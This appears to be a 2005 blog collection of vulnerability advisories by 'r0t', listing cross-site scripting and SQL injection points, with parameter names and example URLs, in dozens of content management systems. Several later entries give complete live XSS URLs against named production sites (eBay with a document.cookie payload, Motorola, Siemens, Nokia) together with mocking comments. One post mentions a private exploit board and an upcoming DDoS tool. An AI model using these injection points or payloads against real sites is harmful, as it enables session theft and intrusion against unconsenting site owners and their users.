This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

Sitekit CMS multiple XSS vuln.

Sitekit CMS multiple XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vednor:http://www.sitekit.net/
affected version:v6.6 and prior

Product Description:

Sitekit CMS v6.6 enables non-technical business users to manage every aspect of their website with ease. Providining a fully supported, secure and managed service, Sitekit Content Management System Technology together with our UK wide Partner Network is your assurance of web excellence. Sitekit CMS has a comprehensive range of web management features such as E-Marketing, E-Business and Asset Managers, each designed to give you the power of the web at your finnger tips. No fuss. No headaches. Just seamless performance. With four full product launches per year, Sitekit Solutions are relentless in providing the latest business benefits. * Top Search Engine Rankings * Leading Accessibility (Bobby AAA, W3C) * Ease of use * Strong Return on Investment * Flexible solution that can be scaled in size and function * Seamless intergration with IT systems

Vuln. Description:

Sitekit CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "textonly" and "locID" "lang" "ClickFrom" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/default.aspx?[xss]
/Default.aspx?textonly=[xss]
/Default.aspx?textonly=1&locID=[xss]
/Default.aspx?textonly=1&locID=0ad00v005&lang=[xss]
/Request-call-back.html?ClickFrom=[xss]
/registration-form.html?ClickFrom=[xss]

Solution:
Edit the source code to ensure that input is properly sanitised.

SCOOP! Multiple XSS vuln.

SCOOP! Multiple XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://scoop.cim.com.au/
affected version:2.3 and prior


Product Description:

SCOOP! is the innovative Australian web content management system that will change the way we see and manage the content of our web sites. The SCOOP! web content management system allows web site managers and owners to publish and manage web site content without any HTML or web scripting knowledge. SCOOP! employs browser based editing of web content and template management. Content managers rather than programmers or IT departments, can publish text and images through an intuitive browser based interface, from anywhere, anytime.

Vuln. Description:

SCOOP!contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "keywords" and "username" "area" "articleZoneID" "r" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

+

attacker can chose wich parameters whe want to show/give to his target, using "category.asp" "articleZone.asp" "account_login.asp" "lostPassword.asp" "articleSearch.asp", because in those scripts paramters isnt filtred,see examples below:

examples:


/articleSearch.asp?keywords=[XSS]

/lostPassword.asp?username=[XSS]

/account_login.asp?Username=[XSS]

/account_login.asp?Password=[XSS]

/category.asp?area=[XSS]

/category.asp?area=support&articleZoneID=[XSS]

/category.asp?area=support&articleZoneID=132&r=[XSS]


You can change to any paremters you want where script use some parameters:)

/category.asp?pridels_Crew_XSS_r0t=[XSS]

/articleZone.asp?r0t_r0t_r0t_r0t_r0t=[XSS]

/account_login.asp?r0t_like_THIS=[XSS]

/lostPassword.asp?GIVE_TO_r0t_ADMIN_PWD=[XSS]

/articleSearch.asp?FIND_SCOOP!_BEST_CODERS=[XSS]

/prePurchaserRegistration.asp?isn't_lame_2_purchase?=[XSS]

/requestDemo.asp?_whata_*faq*?=[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

Scoop XSS vuln.

Scoop XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://scoop.kuro5hin.org/
affected version: 1.1 RC1 and prior

Product Description:

Scoop is a "collaborative media application". It falls somewhere between a content management system, a web bulletin board system, and a weblog. Scoop is designed to enable your website to become a community. It empowers your visitors to be the producers of the site, contributing news and discussion, and making sure that the signal remains high.

A scoop site can be run almost entirely by the readers. The whole life-cycle of content is reader-driven. They submit news, they choose what to post, and they can discuss what they post. Readers can rate other readers comments, as well, providing a collaborative filtering tool to let the best contributions float to the top. Based on this rating, you can also reward consistently good contributors with greater power to review potentially untrusted content. The real power of Scoop is that it is almost totally collaborative.

Of course, as an admin, you also may pick and choose which tools you want the community to have, and which will be available to admins only. Administrators have a very wide range of customization and security management tools available. All of the administration of Scoop is done through the normal web interface. Scoop will seamlessly provide more options to site administrators, right in the normal site, so the tools you need are always right where you need them.



Vuln. Description:

Scoop contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "type" and "count" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/?op=search&offset=0&old_count=30&type=[XSS]

/?op=search&offset=0&old_count=30&type=story
&topic=§ion=&string=r0t&count=1[XSS]



/story/2005/11/4/184932/452[XSS]
/story/2005/11/4/184932[XSS]
/story/2005/11/4[XSS]
/story/2005/11[XSS]
/story/2005[XSS]
/story/[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

Redakto WCMS multiple XSS vuln.

Redakto WCMS multiple XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://computeroil.com/
affected version:3.2 and prior

Product Description:

With our Content Management System Redakto, you and your team, can easily maintain, organize anddesign your web presentation. No coding skills or alike are needed to get you up and running.Still you will get all the flexibility to adjust your website to your needs.
Within minutes you will be able to start filling your content, insert images, documents, importyour Word/Excel Files, generate multilingual websites and much more. Redakto offers you aintuitive and easy to use User interface and can be used with every browser.


Vuln. Description:

Redakto WCMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "iid/iid2" "lang" "r" "cart" "str" "nf" "a" and search module parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:


/index.tpl?iid=[XSS]

/index.tpl?iid=l3a1b3&lang=[XSS]

/index.tpl?iid=l3a1b3&lang=1&iid2=[XSS]

/index.tpl?iid=l3a1b3&lang=1&iid2=3&r=[XSS]

/index.tpl?iid=l093a1b1&lang=1&iid2=[iid2]&r=
[r]&cart=[XSS]

/index.tpl?iid=l093a1b1&lang=1&iid2=[iid2]&r=
[r]&cart=11351542306899006&str=[XSS]

/index.tpl?a=search_adv&cart=113515443393191
01&lang=1&iid=13&nf=[XSS]

/index.tpl?a=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

RAMSite R|1 CMS XSS vuln.

RAMSite R|1 CMS XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://ramsiter1.imikalsen.com/
affected version:1.0 and prior

Product Description:

The RAMSite R|1 CMS is an advanced, yet easy to use and lightweight, complete web-publishing solution. It is filled with useful and interesting features, and is built upon an architecture specifically designed to allow impressive development cycles for additional modules.

Vuln. Description:

RAMSite R|1 CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

ProjectApp mutliple XSS vuln.

ProjectApp mutliple XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:www.aspapp.com/content.asp?contentid=323
affected version:v3.3 and prior

Product Description:

ProjectApp is a customizable groupware solution that provides a suite of project and task management tools to foster team communication. Track projects and tasks, share and distribute centralized docs and knowledge.

Vuln. Description:

ProjectApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "keywords" "projectid" "ret_page" "skin_number" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/forums.asp?keywords=[XSS]
/search_employees.asp?keywords=[XSS]
/cat.asp?keywords=[XSS]
/links.asp?keywords=[XSS]
/pmprojects.asp?projectid=[XSS]
/login.asp?ret_page=[XSS]
/default.asp?skin_number=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

IntranetApp XSS vuln.

IntranetApp XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:www.aspapp.com/content.asp?contentid=322
affected version:3.3 and prior

Product Description:

IntranetApp gets groups on the same page with tools to enhance collaboration and communication. With this pre-built application you can create and manage company employees, news, events, projects, tasks, Web resources, documents and discussion forums. IntranetApp is completely Web based and customizable. Full source code (standard .asp) included.

Vuln. Description:

IntranetApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "ret_page" paremter in "login.asp" and "do_search" "search" in "content.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/login.asp?ret_page=[XSS]

/content.asp?CatId=&ContentType=
&keywords=r0t&search=%3E&do_search=[XSS]

/content.asp?CatId=&ContentType=&
keywords=r0t&search=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

SiteEnable XSS vuln.

SiteEnable XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.siteenable.com/
affected version:3.3 and prior

Product Description:

SiteEnable is an open source Web application that combines content management and collaboration tools. It falls somewhere between a portal, content management system, a web bulletin board system and a collaborative application. SiteEnable is an instant website that is skinnable and standards-based. SiteEnable enables you or staff to easily update content -- whereever and whenever you need. SiteEnable can be used as a content management system, business Website, collaboration tool, community, project management tool and other content-centric Web-based initiatives.

Vuln. Description:

SiteEnable contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "ret_page" paremter in "login.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:


/login.asp?ret_page=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

PortalApp XSS vuln.

PortalApp XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.portalapp.com/
affected version:3.3 and prior


Product Description:

PortalApp is an open source Web application that combines content management with e-commerce and collaboration. It falls somewhere between a portal, content management system, a web bulletin board system, storefront and a collaborative application. PortalApp is an instant website that is skinnable and standards-based. PortalApp is designed to enable your address 90% of the functionality that most Websites require. It enables you to sell on-line, manage members, and easily update content -- whereever and whenever you need. PortalApp can be used as a content management system, business Website, collaboration tool, community, project management tool and other content-centric Web-based initiatives.


Vuln. Description:

PortalApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "ret_page" paremter in "login.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/login.asp?ret_page=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

Polopoly XSS vuln.

Polopoly XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.polopoly.com/
affected version:9 and prior

Product Description:

Polopoly is 100% Java since 1996 and embraces standards and open architecture. The system is browser independent, DB independent, and platform independent. The system thrives in high traffic, personalized web environments.

Vuln. Description:

Polopoly contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

Plexcor's® CMS XSS vuln.

Plexcor's® CMS XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.plexcor.com/
affected version: 4.0 and prior

Product Description:

Integrated modular content, communications, calendar, commerce, customer and project management solution


Vuln. Description:

Plexcor contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

phpSlash SQL vuln.

phpSlash SQL vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.php-slash.org/
affected version:0.8.1 and prior

Product Description:

phpSlash is a CMS that provides an easy and flexible means to publish websites.ddd It currently boasts full HTML templates, an OO design, the ability to operate in a hosted environment, and a bunch of other goodies..d

Vuln. Description:

phpSlash contains a flaw that allows a remote sql injection attacks.Input passed to the "story_id" parameter in "article.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

example:

/article.php?story_id=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Papoo Multiple SQL vuln.

Papoo Multiple SQL vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.papoo.org/
affected version:2.1.2 and prior

Product Description:

Papoo ist an easy to use, accessible CMS. It respects for Frontend and Administration the rules of the WCAG and ATAG. Papoo is Open Source.

Vuln. Description:

Papoo contains a flaw that allows a remote sql injection attacks.Input passed to the "menuid" parameter in "index.php" "guestbook.php" and "forumid" "reporeid_print" parameter in "print.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

examples:

/index.php?menuid=[SQL]
/guestbook.php?menuid=[SQL]
/print.php?reporeid_print=&forumid=[SQL]
/print.php?reporeid_print=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

papaya CMS XSS vuln.

papaya CMS XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.papaya-cms.com/
affected version: 4.0.4 and prior

Product Description:

papaya CMS content management system and framework was designed for individual, mid-sized and enterprise wide deployments. The papaya CMS meets large-scaled project requirements and offers extremely short implementation times. Since 2001, papaya CMS has been deployed at high profile customers such as AGOF (members include: AOL, GMX, Bauer, Gruner & Jahr, Web.de, Yahoo Inc., Lycos Inc. etc.), DHL and the Handelsblatt publishing group. papaya is based on proven OpenSource technologies as PHP, XSLT/XML and supports RDBS (e.g. MySQL and PostgreSQL). papaya is OpenSource software (under GPL-license) since 2005. papaya Software GmbH delivers website creation and custom application development. More information: www.papaya-cms.com PLEASE NOTE: The website is only available in german until mid of June, 2005. The GUI and the documentation is already available in english. In the meantime, feel free to check http://www.lamparea.org/papaya_software.28.html for a short description or to contact the maintainer of this project for further information.

Vuln. Description:

papaya CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "bab[searchfor]" paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/suche.153.html?bab[page]=6&bab[searchfor]=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

HOW secure is ebay.com?

You will see how secure after checking live example below:)

http://search.ebay.com/search/search.dll?
sofocus=bs&sbrftog=1&fcl=4&from=R10&catref
=C12&satitle=fur+trim*&sacat=63862%26catref
%3DC6&bs=Search&fsop=1%26fsoo%3D1&fgtp=&a54=
-24%3Cscript%3Ealert()%3C/script%3E&a22868=-
24&a94=-24&gcs=1110&pfid=1283&reqtype=1&pfmode=
1&alist=a54%2Ca55%2Ca22868%2Ca53%2Ca94%2Ca3801
&pf_query=fur+trim*&sargn=-1%26saslc%3D2&sadis
=200&fpos=94062&sappl=1&ftrt=1&ftrv=1&sabdlo=
&sabdhi=&saprclo=%22%3E%3Cscript%3Ealert(5)
%3C/script%3E&saprchi='%22%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

i forgot SonyEricsson made also good phones

I forget about those great phones that develop SonyEricsson

manually:

http://www.sonyericsson.com/spg.jsp?cc
=be&lc=nl&ver=4000&template=ph1_3&zone=ps

in search field enter: [XSS]

SAGEM made phones:)

I dont know many phone companys next wich i did remember was sagem, so here you got, they lammer work!

manualy use:
http://www.sagem-online.com/isa-b2c/b2c/accountForward.do

in email field put: [XSS]

Motorola isn't better:)

This case isnt similar to others, but anyway vuln.
in this case they chosed for they shop using digitalriver service:)

http://motorola.digitalriver.com/servlet/
ControllerServlet?Action=DisplayHomeMotostor
ShopPage&SiteID=motostor&Locale=en_US&Env=
%22%3E%3Cscript%3Ealert('Motorola,%20r0t%20
like%20some%20phones%20,%20but%20not%20your
%20coders,%20your%20coders%20suck!')%3C/script%3E

http://motorola.digitalriver.com/servlet/Contro
llerServlet?Action=DisplayHomeMotostorShopPage
&SiteID=motostor&Locale=%22%3E%3Cscript%3Ealert
('Motorola,%20r0t%20like%20some%20phones%20,%20
but%20not%20your%20coders,%20your%20coders%20suck
!')%3C/script%3E

Siemens XSS or they have good phones,but no coders:)

http://siemens.com/index.jsp?sdc_ggid=
&sdc_tabidx=&sdc_countryid=0&sdc_flags=
0&sdc_pnid=0&sdc_zoneid=1&sdc_langid=1
&sdc_sectionid=0&sdc_contentid=255&sdc_
linkid=1327885&sdc_sid=33514031252&sdc_
rh=&sdc_bcpath=%22%3E%3Cscript%3Ealert
('r0t%20loves%20siemens%20phones,but%20
coders%20as%20always%20sucks!')%3C/scri
pt%3E

http://siemens.com/index.jsp?sdc_ggid=&s
dc_tabidx=&sdc_countryid=0&sdc_flags=0&s
dc_pnid=0&sdc_zoneid=1&sdc_langid=1&sdc_
sectionid=0&sdc_contentid=%22%3E%3Cscript
%3Ealert('r0t%20loves%20siemens%20phones,
but%20coders%20as%20always%20sucks!')%3C/
script%3E

Solution:

Get better coders!



PS. coders from siemens... lammers!

NOKIA XSS or r0t loves noki

http://www.nokia.com/search/index.jsp?wsid=
8&qt=&charset=%22%3E%3Cscript%3Ealert('r0t%20loves%
20nokia%20phones,%20but%20coders%20sucks!')%3C/script%3E

solution:
Get better coders!

OpenEdit XSS vuln.

OpenEdit XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.openedit.org
affected version:4.0 and prior

Product Description:

Developed in partnership with Web designers, OpenEdit offers a host of popular features. It includes easy online editing, sophisticated eCommerce, corporate blogging and dynamic layouts in an open source environment for flexible, advanced website development. OpenEdit President Christopher Burkey and a core team of expert Java architects have created OpenEdit by combining the best of existing Java frameworks.

Vuln. Description:

OpenEdit contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "page" "oe-action" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:
/store/search/results.html?query=&department=&oe-action=[XSS]
/store/search/results.html?page=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

OpenCms XSS vuln.

OpenCms XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.opencms.org/
affected version:6.0.3 and prior

Product Description:

OpenCms is a professional level Open Source Website Content Management System. OpenCms helps to create and manage complex websites easily without knowledge of html. An integrated WYSIWYG editor with a user interface similar to well known office applications helps the user creating the contents, while a sophisticated template engine enforces a site-wide corporate layout. As true Open Source software, OpenCms is completely free of licensing costs. OpenCms is based on Java and XML technology. Therefore it fits perfectly into almost any existing modern IT infrastructure. OpenCms runs in a "full open source" environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g. Windows NT, IIS, BEA Weblogic, Oracle DB).

Vuln. Description:

OpenCms contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

about our site and board.

I decided our we decided that our site and board will re-launch at 2006 year 1 january !
Cauz, no i our other team members have enough time to manage it, site and board is working also now but its isnt public.
Board is only working cauz there is alot of people who share they private advisories and exploits wich will be only later public or will be never public.
Also i hope soon cembo will release public "Alberts" DDOS attack tool .
So, as you can imagine we have alot to do , but not enough time for everything .
Still we need spanish and german help for board, board will be on English(main) and Latvian,Russian,Spanish (i hope),German(i hope).Other languages and specialist are also welcome.
I know that many previous members can´t wait to join community board, but sorry everything is in maintance and we will back only on 2006 year :)

NQcontent V3 XSS vuln.

NQcontent V3 XSS vuln.

Vuln. discovered by : r0t
Date: 19 dec. 2005
vendor:http://www.nqcontent.com/
affected version:V3 Professional Edition,V3 Enterprise Edition,V3 Comparison Matrix.

Product Description:

NQcontent is a dynamic web content management system that extends traditional CMS capabilities to include a powerful application development and integration framework. NQcontent will revolutionise the speed and ease of delivery of your internet, intranet, extranet and portals, seamlessly integrating and future proofing your online investment.



Vuln. Description:

NQcontent contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

MMBase XSS vuln.

MMBase XSS vuln.

Vuln. discovered by : r0t
Date: 19 dec. 2005
vendor:http://www.mmbase.org/
affected version: 1.7.4 and prior


Product Description:

Open source object oriented Java based enterprise content management system. Platform independent, all major operating systems (Windows, Unix, Linux), databases (Oracle, DB2, Informix, MSSQL, MySQL, PostgreSQL) servlet containers (Tomcat, Orion, and J2EE application servers like JBoss, Jonas, IBM Websphere, BEA weblogic).


Vuln. Description:

MMBase contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

Miraserver SQL vuln.

Miraserver SQL vuln.

Vuln. discovered by : r0t
Date: 19 dec. 2005
vendor:http://www.miraserver.com
affected version: Miraserver v.1.0 RC4 and prior


Product Description:

MiraServer is a content management system aimed to ease the task of web content delivery and management for large content portals, but has the flexibility to handle smaller sites as well. It can handle web pages, articles, news headlines and FAQs. Among its features are WYSIWYG editing, integrated user comment system, optional vBulletin integration, full template-control system, file attachments and much more.



Vuln. Description:


Miraserver contains a flaw that allows a remote sql injection attacks.Input passed to the "page" parameter in "index.php" and "id" parameter in "newsitem.php" and "cat" parameter in "article.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

examples:

/index.php?page=[SQL]
/newsitem.php?id=[SQL]
/article.php?cat=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Mercury CMS™ vuln.

Mercury CMS™ vuln.

Vuln. discovered by : r0t
Date: 18 dec. 2005
vendor:http://www.mercury-cms.com
affected version:4.0 and prior


Product Description:

Mercury CMS™ v4.0 is an extensible, modular, enterprise-level content management system at entry-level costs. The four Editions of the CMS - Lite, Professional, Portal and E-Commerce - provide complete set of functionality to satisfy the business needs of our clients. Mercury CMS™ allows non-technical personnel to manage and edit content using secure and easy to use, browser-based interfaces.
We designed the Mercury CMS™ v4.0 to provide maximum aesthetic flexibility by utilizing custom templates and multi-level styling. What makes this CMS unique are features like parallel editing, content granulation where pages are containers and content is organized in sections, snippets, modules; site is organized in areas (public, intranet, extranet, hidden); meta tags, styles, and repeating content are configured on multiple levels (global, area, page); and more.
Flexible extensibility provides secure integration with third party and custom applications.
The Architecture of Mercury CMS™ v4.0 allows for the inclusion of additional modules and technologies as you require them. There are more than 40 modules currently available for the system and this number constantly grows. We give you 17 of those modules for free to get you started fast and at very low cost.

Vuln. Description:

SQL.
Mercury CMS™ contains a flaw that allows a remote sql injection attacks.Input passed to the "page" parameter in "index.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


/index.cfm?page=[SQL]


XSS.
Mercury CMS™ contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "content" "criteria" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


/index.cfm?page=40&criteria
=&start=11&title=&content=[XSS]

/index.cfm?restricted=false&page=10&criteria=[XSS]



Solution:
Edit the source code to ensure that input is properly sanitised.

Marwel SQL inj.

Marwel SQL inj.

Vuln. discovered by : r0t
Date: 18 dec. 2005
vendor:www.qcm.cz
affected version:2.7 and prior

Vuln. Description:

Marwel contains a flaw that allows a remote sql injection attacks.Input passed to the "show" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

/index.php?show=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Magnolia XSS vuln.

Magnolia XSS vuln.

Vuln. discovered by : r0t
Date: 18 dec. 2005
vendor:http://www.magnolia.info
affected version:2.1 and prior

Product Description:

Magnolia is the free, open source, J2EE deployable content management system (CMS) developed by obinary. Magnolia is written in Java and uses the upcoming standard API for Java-based content repositories (JCR) to access its content. It has an easy to use web-browser interface, a clear API and a useful custom tag library for easy templating in JSP and Servlets.
Magnolia is the first open-source content-management-system (CMS) which has been built from scratch to support the upcoming standard API for java content repositories (JCR).
Its main goal is ease of use for all parties involved in running a CMS.
Magnolia is distributed as a double-clickable binary installer. It includes everything you need to get you started with a standalone installation in less than 10 minutes. Magnolia runs on all common operating-systems (JDK 1.4.1 or later required). No additional software or databases are needed.
Magnolia Content Management features a very flexible structure, platform-independence through the use of Java and XML, a simple to use API, easy templating through the use of JSP, JSTL and a custom tag library, automatic administrative UI generation, transparent and uniform data access to multiple data repositories, easy configuration through XML, easy application integration and easy deployment with professional staging on any J2EE Server.
Magnolia is actively being developed by obinary. It is available free of charge as an open source product. We provide a binary download based on tomcat for easy deployment on Mac OS X, Windows, Linux and Solaris.


Vuln. Description:

Magnolia contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "query" paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/search.html?query=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

Lutece XSS vuln.

Lutece XSS vuln.

Vuln. discovered by : r0t
Date: 18 dec. 2005
vendor:http://lutece.paris.fr
affected version:1.2.3 and prior

Product Description:

Lutece is a web portal engine that lets you quickly create internet or intranet dynamic sites based on HTML, XML or database contents. This Open Source software is written in Java and mainly based on Apache Software Foundation (Jakarta and XML projects). Lutece runs as well under Linux or Windows platforms. The default database is MySQL. Lutece provides a very simple administration interface that can be used directly by end users without any technical skills. Lutece is free software, distributed under a BSD like license.

Vuln. Description:

Lutece contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

Lighthouse CMS XSS vuln.

Lighthouse CMS XSS vuln.

Vuln. discovered by : r0t
Date: 18 dec. 2005
vendor:http://www.lighthouse-cms.de/en/
affected version:1.1.0 and prior


Product Description:

Lighthouse is a modern, user friendly, high performance Content Management System. Lighthouse lets you create and manage web applications intuitively.
Lighthouse allows you easy access and effective management of your web presence. Lighthouse enables you to put Enterprise Content Management to use for your business. With its modular structure, it offers you exactly the features you need, saving you time and money.
Lighthouse is at home on all major platforms and can be used with a wide range of databases.

Vuln. Description:

Lighthouse contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "search" paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


/?search=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

Liferay Portal Enterprise 3.6.1 XSS

Liferay Portal Enterprise 3.6.1 XSS

Vuln. discovered by : r0t
Date: 18 dec. 2005
vendor:http://liferay.com/
affected version:3.6.1 and prior

Product Description:

One of the leading open-source portal servers with a flexible, business-friendly license, Liferay is truly open source and doesn't lock you in to a specific vendor's database or application server. We also have a dedicated team of developers and consultants to complement our product with support, training, and professional services. We are one of the most mature products in the portal space and have complemented our existing CMS functionality with a slew of new features in version 3.6.1 that make integration of portal and CMS applications easier than ever. Liferay Portal ships with more portlets out of the box than any other portal platform. It can be run on a servlet container or a full-blown J2EE application server.

Vuln. Description:

Liferay Portal Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "_77_struts_action" "p_p_mode" "p_p_state" and search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/web/guest/downloads/portal_ent?p_p_id=77
&p_p_action=1&p_p_state=maximized&p_p_mod
e=view&p_p_col_order=null&p_p_col_pos=2&p
_p_col_count=3&_77_struts_action=[XSS]


/web/guest/downloads/portal_ent?p_p_id=77
&p_p_action=1&p_p_state=maximized&p_p_mod
e=[XSS]


/web/guest/downloads/portal_ent?p_p_id=77
&p_p_action=1&p_p_state=[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

Libertas Enterprise CMS XSS vuln.

Libertas Enterprise CMS XSS vuln.

Vuln. discovered by : r0t
Date: 18 dec. 2005
vendor:http://www.libertas-solutions.com/
affected version:3.0 and prior

Product Description:

Libertas Enterprise Content Management Server is used by larger organisations and government departments. Standards compliance is core to this CMS product with Dublin Core, eGifs, eForms, UK Government Access Keys and support for numerous XML standards. The system's n-tier architecture is highly scalable ensuring maximum availability. The interface is exceptionally easy to use, requiring limited training for staff already familiar with popular word processing applications. Like all Libertas Solutions suite of CMS products, creating accessible websites is fundamental with tools to ensure WAI / section 508 compliant sites.


Vuln. Description:

Libertas Enterprise CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "page_search" paramter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/search/index.php?advanced=0&associa
ted_list=&page=1&search=0&page_search=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

damoon® XSS vuln

damoon® XSS vuln

Vuln. discovered by : r0t
